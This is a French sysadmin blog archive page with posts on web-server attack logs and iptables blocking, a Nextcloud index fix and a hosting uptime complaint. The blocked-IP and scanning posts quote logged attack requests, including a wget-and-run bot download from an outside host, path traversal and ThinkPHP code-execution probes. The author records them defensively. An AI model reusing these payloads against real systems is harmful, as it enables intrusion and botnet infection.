Archives de catégorie : Internets

Attaque de l’IP : 45.9.20.101 (Amsterdam)

Publié le par
Répondre

Voici toutes les tentatives :

45.9.20.101 - - [11/May/2022:09:56:44 +0200] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 302 218 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:09:56:45 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80/Autodiscover/Autodiscover.xml" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:47 +0200] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:11:09:48 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /console/ HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:05:05 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/console/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:06 +0200] "GET / HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:12:25:08 +0200] "GET /user/auth/login HTTP/1.1" 200 13468 "https://80.15.48.50:443/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21 HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:13:29:32 +0200] "GET /user/auth/login HTTP/1.1" 200 8272 "http://80.15.48.50:80/index.php?s=/Index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:19 +0200] "GET /?a=fetch&content=die(@md5(HelloThinkCMF)) HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:01:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/?a=fetch&content=die(@md5(HelloThinkCMF))" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:14:38:52 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:21 +0200] "GET /actuator/gateway/routes HTTP/1.1" 302 5554 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:15:02:24 +0200] "GET /user/auth/login HTTP/1.1" 200 13465 "https://80.15.48.50:443/actuator/gateway/routes" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /solr/admin/info/system?wt=json HTTP/1.1" 302 400 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
45.9.20.101 - - [11/May/2022:16:01:06 +0200] "GET /user/auth/login HTTP/1.1" 200 8269 "http://80.15.48.50:80/solr/admin/info/system?wt=json" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"

C’est pas la première fois visiblement :

# grep "45.9.20.101" /var/log/apache2/access.humhub.log* | wc -l
65

Un conseil :

iptables -A INPUT -s 45.9.20.101 -j DROP
/usr/sbin/iptables-save > /etc/iptables/rules.v4

NEXTCLOUD : Problème d’index

Publié le par
Répondre

J’avais l’erreur suivante :

La base de données a quelques index manquants. L’ajout d’index dans de grandes tables peut prendre un certain temps. Elles ne sont donc pas ajoutées automatiquement. En exécutant « occ db:add-missing-indices », ces index manquants pourront être ajoutés manuellement pendant que l’instance continue de tourner. Une fois les index ajoutés, les requêtes sur ces tables sont généralement beaucoup plus rapides.

-Index « fs_id_storage_size » manquant dans la table « oc_filecache ».
-Index « fs_storage_path_prefix » manquant dans la table « oc_filecache ».
-Index « properties_pathonly_index » manquant dans la table « oc_properties ».
-Index « job_lastcheck_reserved » manquant dans la table « oc_jobs ».

J’ai du mal à comprendre pourquoi les index ne sont pas fait automatiquement :

$ sudo -u www-data php8.0 /usr/share/nginx/nextcloud/occ db:add-missing-indice
Check indices of the share table.
Check indices of the filecache table.
Adding additional size index to the filecache table, this can take some time...
Filecache table updated successfully.
Adding additional path index to the filecache table, this can take some time...
Filecache table updated successfully.
Check indices of the twofactor_providers table.
Check indices of the login_flow_v2 table.
Check indices of the whats_new table.
Check indices of the cards table.
Check indices of the cards_properties table.
Check indices of the calendarobjects_props table.
Check indices of the schedulingobjects table.
Check indices of the oc_properties table.
Adding properties_pathonly_index index to the oc_properties table, this can take some time...
oc_properties table updated successfully.
Check indices of the oc_jobs table.
Adding job_lastcheck_reserved index to the oc_jobs table, this can take some time...
oc_properties table updated successfully.

Le problème est maintenant fixé.

Liste des IP bloqués

Publié le par
Répondre

J’ai donc bloqué des IP suivantes :

42.193.42.236 - - [11/May/2022:10:13:54 +0200] "m+-rf+NW_BBBarm7%3b%23&remoteSubmit=Save" 400 0 "-" "-"
47.106.177.157 - - [11/May/2022:08:13:31 +0200] "GET /shell?cd+/tmp;+wget+http:/\\/51.81.133.91/FKKK/NW_BBB.arm;+chmod+777+NW_BBB.arm;+./NW_BBB.arm Jaws.Selfrep;rm+-rf+NW_BBB.arm" 400 0 "-" "-"
31.44.185.235 - - [11/May/2022:07:13:08 +0200] "GET /../../../mnt/mtd/Config/Account1 HTTP/1.1" 400 485 "-" "Mozilla/5.0 zgrab/0.x"
80.94.93.125 - - [11/May/2022:02:14:23 +0200] "POST /mgmt/tm/util/bash HTTP/1.1\n" 400 0 "-" "-"
164.92.236.186 - - [11/May/2022:00:18:53 +0200] "\x16\x03\x01" 400 0 "-" "-"

Le plus grand nombre venait de cette IP :

IP Address Country Region City
42.193.42.236 China Beijing Beijing
ISP Organization Latitude Longitude
Tencent Cloud Computing (Beijing) Co. Ltd. Not Available 39.9075 116.3972

Le blocage :

#  iptables -A INPUT -s 42.193.42.236 -j DROP
#  iptables -A INPUT -s 47.106.177.157 -j DROP
#  iptables -A INPUT -s 31.44.185.235 -j DROP
#  iptables -A INPUT -s 80.94.93.125 -j DROP
#  iptables -A INPUT -s 164.92.236.186 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

NUXIT : Calcul de la SLA pour CYBERNEURONES chez NUXIT

Publié le par
Répondre

Je pense qu’il y a une perte de qualité dans le service de NUXIT ! Mon offre est Performence 1 à 10,80 Euros/mois.

Voici toutes les pannes sur un an chez https://www.nuxit.com/ :

  • 28/04/2022, 19:28 : It appeared offline or unresponsive for approximately 26 mins.
  • 28/04/2022, 07:51 : It appeared offline or unresponsive for approximately 12 mins.
  • 25/03/2022, 02:01 : It appeared offline or unresponsive for approximately 5 mins.
  • 23/03/2022, 13:12 : It appeared offline or unresponsive for approximately 5 mins.
  • 17/03/2022, 17:22: It appeared offline or unresponsive for approximately 20 mins.
  • 16/03/2022, 21:51 : It appeared offline or unresponsive for approximately 10 mins.
  • 16/03/2022, 03:14 : It appeared offline or unresponsive for approximately 52 mins,
  • 15/03/2022, 23:51 : It appeared offline or unresponsive for approximately 5 mins.
  • 01/03/2022, 01:03 : It appeared offline or unresponsive for approximately 5 mins.
  • 18/02/2022, 02:10 : It appeared offline or unresponsive for approximately 14 mins.
  • 11/02/2022, 11:31 : It appeared offline or unresponsive for approximately 10 mins.
  • 08/02/2022, 01:15 : It appeared offline or unresponsive for approximately 20 mins.
  • 05/02/2022, 12:28 : It appeared offline or unresponsive for approximately 10 mins.
  • 26/01/2022, 21:02 : It appeared offline or unresponsive for approximately 4 mins.
  • 26/01/2022, 20:14 : It appeared offline or unresponsive for approximately 10 mins.
  • 16/01/2022, 07:44 : It appeared offline or unresponsive for approximately 12 mins.
  • 14/01/2022, 13:48 : It appeared offline or unresponsive for approximately 20 mins.
  • 09/01/2022, 03:52 : It appeared offline or unresponsive for approximately 3 hours.
  • 07/01/2022, 05:44 : It appeared offline or unresponsive for approximately 3 hours.
  • 22/12/2021, 20:31 : It appeared offline or unresponsive for approximately 6 mins
  • 16/11/2021, 11:57 : t appeared offline or unresponsive for approximately 5 mins.
  • 11/11/2021, 11:45 : It appeared offline or unresponsive for approximately 5 mins.
  • 11/11/2021, 02:44 : It appeared offline or unresponsive for approximately 44 mins.
  • 07/11/2021, 17:43 : It appeared offline or unresponsive for approximately 28 mins.
  • 07/11/2021, 16:02 : It appeared offline or unresponsive for approximately 4 mins.
  • 25/10/2021, 13:32 : It appeared offline or unresponsive for approximately 5 mins.
  • 24/10/2021, 17:48 : It appeared offline or unresponsive for approximately 40 mins.
  • 22/10/2021, 17:13 : It appeared offline or unresponsive for approximately 28 mins.
  • 05/10/2021, 12:48 : It appeared offline or unresponsive for approximately 4 mins.
  • 29/09/2021, 10:27 : It appeared offline or unresponsive for approximately 10 mins.
  • 28/09/2021, 15:42 : It appeared offline or unresponsive for approximately 5 mins.
  • 14/09/2021, 13:48 : It appeared offline or unresponsive for approximately 5 mins.
  • 11/09/2021, 17:29 : It appeared offline or unresponsive for approximately 10 mins.
  • 05/09/2021, 11:06 : It appeared offline or unresponsive for approximately 12 mins.
  • 19/08/2021, 23:00 : It appeared offline or unresponsive for approximately 6 mins.
  • 19/08/2021, 03:51 : It appeared offline or unresponsive for approximately 12 mins.
  • 14/08/2021, 10:41 : It appeared offline or unresponsive for approximately 10 mins.
  • 11/08/2021, 20:29 : It appeared offline or unresponsive for approximately 28 mins.
  • 11/08/2021, 19:17: It appeared offline or unresponsive for approximately 10 mins.
  • 08/08/2021, 08:54 : It appeared offline or unresponsive for approximately 11 mins.
  • 29/07/2021, 17:08 : It appeared offline or unresponsive for approximately 5 mins.
  • 20/07/2021, 15:14 : It appeared offline or unresponsive for approximately 23 mins.
  • 13/07/2021, 17:13 : It appeared offline or unresponsive for approximately 4 mins.
  • 26/06/2021, 10:06 : It appeared offline or unresponsive for approximately 3 hours.
  • 24/06/2021, 12:48 : It appeared offline or unresponsive for approximately 6 mins.
  • 15/06/2021, 03:32 : It appeared offline or unresponsive for approximately 4 mins.
  • 02/06/2021, 03:36 : It appeared offline or unresponsive for approximately 14 min.
  • 27/05/2021, 15:14 : It appeared offline or unresponsive for approximately 38 mins.
  • 20/05/2021, 07:50 : It appeared offline or unresponsive for approximately 12 mins.
  • 19/05/2021, 18:23 : It appeared offline or unresponsive for approximately 6 mins.
  • 18/05/2021, 09:55 : It appeared offline or unresponsive for approximately 5 mins.
  • 18/05/2021, 09:13 : It appeared offline or unresponsive for approximately 5 mins.
  • 18/05/2021, 08:40 : It appeared offline or unresponsive for approximately 14 mins.
  • 17/05/2021, 16:29 : It appeared offline or unresponsive for approximately 14 mins.
  • 17/05/2021, 09:20 : It appeared offline or unresponsive for approximately 22 mins.
  • 17/05/2021, 08:46 : It appeared offline or unresponsive for approximately 29 mins.
  • 07/05/2021, 04:27 : It appeared offline or unresponsive for approximately 5 mins.
  • 24/03/2021, 02:57 : It appeared offline or unresponsive for approximately 10 mins.

J’ai beaucoup plus de coupure que lors du dernier audit, j‘ai 58 coupures avec 3 de 3 heures.

Mon précédent audit : 14 coupures :

  • 20/03/2021 à 08:42 : It was down for approximately 2 hours.
  • 26/02/2021 à 18:06 : It was down for approximately 51 mins.
  • 08/01/2021 à 23:02 : It was down for approximately 1 hour.
  • 20/12/2020 à 10:16 : : It was down for approximately 12 mins.
  • 02/12/2020 à 21:27 : It was down for approximately 25 mins.
  • 02/12/2020 à 20:25 : It was down for approximately 5 mins.
  • 08/10/2020 à 09:47 : It was down for approximately 5 mins.
  • 11/08/2020 à 09:24 : It was down for approximately 6 mins.
  • 04/08/2020 à 17:14 : It was down for approximately 5 mins.
  • 08/07/2020 à 18:11 : It was down for approximately 6 mins.
  • 25/06/2020 à 15:01 : It was down for approximately 52 mins.
  • 25/04/2020 à 17:43 : It was down for approximately 11 mins.
  • 01/04/2020 à 16:38 : It was down for approximately 29 mins.
  • 25/03/2020 à 14:30 : It was down for approximately 3 hours.

JetPack temporise 5 minutes, donc j’ai pas les coupures de moins de 5 minutes.